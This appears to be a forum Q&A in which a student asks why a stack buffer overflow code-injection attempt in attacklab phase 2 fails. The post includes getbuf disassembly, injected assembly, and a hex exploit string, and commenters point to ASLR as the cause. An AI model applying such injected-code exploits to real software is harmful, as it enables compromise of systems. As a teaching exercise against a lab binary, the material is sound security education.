# attacklab phase2 bufferoverflow

Tags: assembly, buffer-overflow

I have to do an attack lab. And I need to run touch2() with buffer overflow.I have to inject code as part of my exploit string in order to make the program point to the address of the function touch2().

When I look at getbuf, I see that it has 0x18 (24) buffers.

```
0000000000001dbc <getbuf>:
    1dbc:       f3 0f 1e fa             endbr64
    1dc0:       48 83 ec 18             sub    $0x18,%rsp
    1dc4:       48 89 e7                mov    %rsp,%rdi
    1dc7:       e8 b5 02 00 00          callq  2081 <Gets>
    1dcc:       b8 01 00 00 00          mov    $0x1,%eax
    1dd1:       48 83 c4 18             add    $0x18,%rsp
    1dd5:       c3                      retq
```

And I found out that the address of touch2() after executing ctarget is 0x555555555e0a, and that %rsp-0x18 is 0x55641138.

And this is my exploit code in assembly. phase2.s

movq    $0x6eb933c2,%rdi
movq    $0x555555555e0a, %rax
pushq %rax
ret

This is my answer I pass into the program.

```
48 c7 c7 c2 33 b9 6e 48 # bytecode of exploit code, padding 0x18
b8 0a 5e 55 55 55 55 00 
00 50 c3 00 00 00 00 00 
38 11 64 55 00 00 00 00 # #address of rsp - 0x38
```

Then I used hex2raw to create and run the phase2.raw file, but no exploit occurs.

```
Cookie: 0x6eb933c2
No exploit.  Getbuf returned 0x1
Normal return
```

Why didn't buffer overflow occur?

Comment: What happen when you step through the program with a debugger? More importantly, is the stack at a fixed location (i.e. ASLR disabled)?

Comment: @MargaretBloom When I run it using gdb, ASLR is used. The original address of touch2() was 0x0000000001e0a, but if you check it through gdb, it is changed to 0x555555555e0a.

Comment: But what happen if you single steps out of `getbuf`? Do the execution lands where you expected to? I'm asking because with ASRL the stack is location is randomized (among other things).

Comment: @MargaretBloom 
I kept running it through gdb, but the location of %rsp does not change

Comment: That's because gdb disable ASRL when you debug. If you have ASRL when you run the program, you approach cannot work. Exploiting stack overflows with ASRL requires at least a bit of ROP (and the binary also have CFE features) and is not easy. Double check your teacher instructions. You didn't provide enough context to answer.